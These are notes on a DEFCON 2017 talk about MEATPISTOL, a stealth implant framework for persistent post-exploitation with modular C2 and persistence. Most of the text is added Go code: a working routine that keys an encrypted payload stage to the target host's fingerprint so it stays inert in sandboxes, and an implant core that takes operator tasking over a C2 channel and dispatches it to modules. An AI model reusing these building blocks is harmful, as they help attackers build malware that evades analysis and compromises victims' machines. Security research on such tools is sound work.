
MEATPISTOL Talk (DEFCON 2017)

Slides
Talk on YouTube

Introduction

  • MEATPISTOL is a framework for creating stealth implants that support persistent adversarial operations
  • Post exploitation tool, not for getting in

All the decent malware was only for Windows

  • Publicly available OSX malware didn't have encrypted comms, persistence or an interactive shell
  • Wrote a Python-based reverse SSH tunnelling tool that used Twitter for C2 resolution and crontab/LaunchDaemon for persistence, with randomized scheduling and an obfuscated generator script
  • Wrote SSH clients/servers in Java and Bash
  • Problem: had to configure new C2 infrastructure for each piece of malware

The ideal tool

  • Select the features for the malware implant
  • C2 infra set up automatically: each C2 endpoint is unique, keys are taken care of
  • Each malware sample is unique, so defenders can't look its hash up in VirusTotal

MEATPISTOL features

  • Modular C2 methods: Reddit, Twitter, a plain server, etc.
  • Can use multiple C2 methods at once
  • Multiple persistence modules
  • Generated malware is customized to the target machine, keyed on some of its system info
  • That way, when the sample is thrown into a sandbox it doesn't detonate and isn't detected
  • Feed in a PCAP and simulate that traffic over the wire
  • Can exfiltrate over multiple connections
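As an added example (not MEATPISTOL's own code, which the talk does not show), the Go program below shows one way the "custom to the machine" point can work: the generator derives an AES key from the target's system info and encrypts the next stage under it, and the implant recomputes the same key at run time, so the stage only decrypts on the intended host. The fingerprint fields (hostname, user, MAC) and the SHA-256 derivation are assumptions for this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// HostFingerprint holds the system info the generator keys the stage on.
// These three fields are an assumption for this example; the talk only
// says "some system info".
type HostFingerprint struct {
	Hostname string
	Username string
	MAC      string
}

// deriveKey maps the fingerprint to a 256-bit AES key. A production
// generator would add a per-build salt and a slow KDF; SHA-256 is enough
// to show the mechanism.
func deriveKey(fp HostFingerprint) []byte {
	h := sha256.New()
	io.WriteString(h, fp.Hostname+"\x00"+fp.Username+"\x00"+fp.MAC)
	return h.Sum(nil)
}

func newGCM(fp HostFingerprint) (cipher.AEAD, error) {
	block, err := aes.NewCipher(deriveKey(fp))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal runs at build time: encrypt the stage under the intended host's key
// and prepend a fresh random nonce. Layout: nonce || ciphertext || tag.
func Seal(fp HostFingerprint, stage []byte) ([]byte, error) {
	gcm, err := newGCM(fp)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, stage, nil), nil
}

// Open runs on the target: recompute the key from the live host and
// decrypt. On any other machine the derived key differs, the GCM tag check
// fails and the implant has nothing to execute, which is what keeps it
// quiet in a sandbox.
func Open(fp HostFingerprint, blob []byte) ([]byte, error) {
	gcm, err := newGCM(fp)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("blob too short")
	}
	nonce, ct := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

func main() {
	// Constructed fingerprints: the intended target and a generic sandbox.
	target := HostFingerprint{Hostname: "ws-042", Username: "alice", MAC: "00:11:22:33:44:55"}
	sandbox := HostFingerprint{Hostname: "sandbox-1", Username: "user", MAC: "00:0c:29:aa:bb:cc"}

	blob, err := Seal(target, []byte("stage-two payload"))
	if err != nil {
		panic(err)
	}
	if stage, err := Open(target, blob); err == nil {
		fmt.Printf("on target: %q\n", stage)
	}
	if _, err := Open(sandbox, blob); err != nil {
		fmt.Println("in sandbox:", err)
	}
}
```

Two caveats a practitioner would want. First, this only defeats analysis environments that do not reproduce the target's fingerprint; an analyst who has the real host's details, or who runs the sample on the real host, gets the key for free. Second, the keying inputs are fragile: a hostname change or NIC swap on the target leaves the implant unable to decrypt its own stage. For defenders, the practical consequence of per-target samples is that hash lookups against VirusTotal stop being useful and behaviour on the actual host is what has to be monitored.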

How they built it

The core

  • Essentially a microkernel that runs module functionality
  • Written in Go, so it runs on Mac/Windows/Linux
  • Has an event loop
  • Has a scheduler loop

Types of modules

  • file: get files to/from the remote PC
  • exec: get a shell
  • c2
  • loot
  • hide: clean up artifacts of persistence
  • persistence

Channel API for modules

  • read()
  • write()
  • attach() - similar to file open
  • detach() - similar to file close
  • close() - after this, no more writes will happen
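To make the microkernel core and the Channel API concrete, here is an added Go sketch (not MEATPISTOL's code, which was never shown) of both together: a `Channel` interface with the five operations named above, an in-memory channel standing in for a real transport, a `Module` interface the core loads by name, and a core whose one-iteration event loop attaches, drains queued tasking, dispatches each task to a module, writes the result back and detaches. The `"<module> <args>"` task format, the in-memory transport and the `file` module over a constructed map are assumptions for this example.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

// Channel is the module-facing API from the talk. Attach/Detach bracket a
// session the way open/close bracket a file; Close ends writes for good.
type Channel interface {
	Attach() error
	Read() ([]byte, error)
	Write(p []byte) error
	Detach() error
	Close() error
}

var (
	ErrNotAttached = errors.New("channel: not attached")
	ErrClosed      = errors.New("channel: closed, no more writes")
)

// MemChannel is an in-memory stand-in for a real transport (Twitter, Reddit,
// a server): inbox holds operator tasking, outbox holds implant output.
type MemChannel struct {
	attached, closed bool
	inbox, outbox    [][]byte
}

func (c *MemChannel) Attach() error {
	if c.closed {
		return ErrClosed
	}
	c.attached = true
	return nil
}

func (c *MemChannel) Detach() error { c.attached = false; return nil }

func (c *MemChannel) Close() error { c.closed, c.attached = true, false; return nil }

// Read returns the next queued task, or nil when nothing is pending.
func (c *MemChannel) Read() ([]byte, error) {
	if !c.attached {
		return nil, ErrNotAttached
	}
	if len(c.inbox) == 0 {
		return nil, nil
	}
	task := c.inbox[0]
	c.inbox = c.inbox[1:]
	return task, nil
}

func (c *MemChannel) Write(p []byte) error {
	if c.closed {
		return ErrClosed
	}
	if !c.attached {
		return ErrNotAttached
	}
	c.outbox = append(c.outbox, append([]byte(nil), p...))
	return nil
}

// Module is what the core loads: a name and a handler for tasking.
type Module interface {
	Name() string
	Handle(args []byte) ([]byte, error)
}

// fileModule stands in for the "file" module over a constructed in-memory FS.
type fileModule struct{ fs map[string][]byte }

func (fileModule) Name() string { return "file" }
func (m fileModule) Handle(args []byte) ([]byte, error) {
	if data, ok := m.fs[string(args)]; ok {
		return data, nil
	}
	return nil, errors.New("no such file")
}

// Core is the microkernel: a module table plus the event loop.
type Core struct {
	modules map[string]Module
	c2      Channel
}

func NewCore(c2 Channel) *Core { return &Core{modules: map[string]Module{}, c2: c2} }
func (k *Core) Register(m Module) { k.modules[m.Name()] = m }

// Dispatch handles one task of the (assumed) form "<module> <args>".
func (k *Core) Dispatch(task []byte) []byte {
	name, args, _ := bytes.Cut(task, []byte(" "))
	m, ok := k.modules[string(name)]
	if !ok {
		return []byte("err: unknown module " + string(name))
	}
	out, err := m.Handle(args)
	if err != nil {
		return []byte("err: " + err.Error())
	}
	return out
}

// RunOnce is one event-loop iteration: attach, drain queued tasking, detach.
// It returns the number of tasks handled.
func (k *Core) RunOnce() (int, error) {
	if err := k.c2.Attach(); err != nil {
		return 0, err
	}
	defer k.c2.Detach()
	n := 0
	for {
		task, err := k.c2.Read()
		if err != nil || task == nil {
			return n, err
		}
		if err := k.c2.Write(k.Dispatch(task)); err != nil {
			return n, err
		}
		n++
	}
}

func main() {
	ch := &MemChannel{inbox: [][]byte{[]byte("file /etc/hostname"), []byte("exec id")}}
	core := NewCore(ch)
	core.Register(fileModule{fs: map[string][]byte{"/etc/hostname": []byte("ws-042\n")}})
	n, err := core.RunOnce()
	fmt.Println("handled:", n, "err:", err)
	for _, out := range ch.outbox {
		fmt.Printf("%s\n", out)
	}
	ch.Close()
	fmt.Println(ch.Attach())
}
```

The scheduler loop from the talk would sit beside `RunOnce`, deciding when to call it (and with what jitter) for each configured channel; the close-versus-detach split is what lets a module hand a channel back temporarily without ending the session, while `Close` is the point after which no write can succeed.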

Lessons learned

  • Great CLI tools are human: MEATPISTOL displays a Taylor Swift quote on startup and MEATPISTOL ASCII art before exiting
  • Minimize the amount of typing the user has to do: add default arguments everywhere it makes sense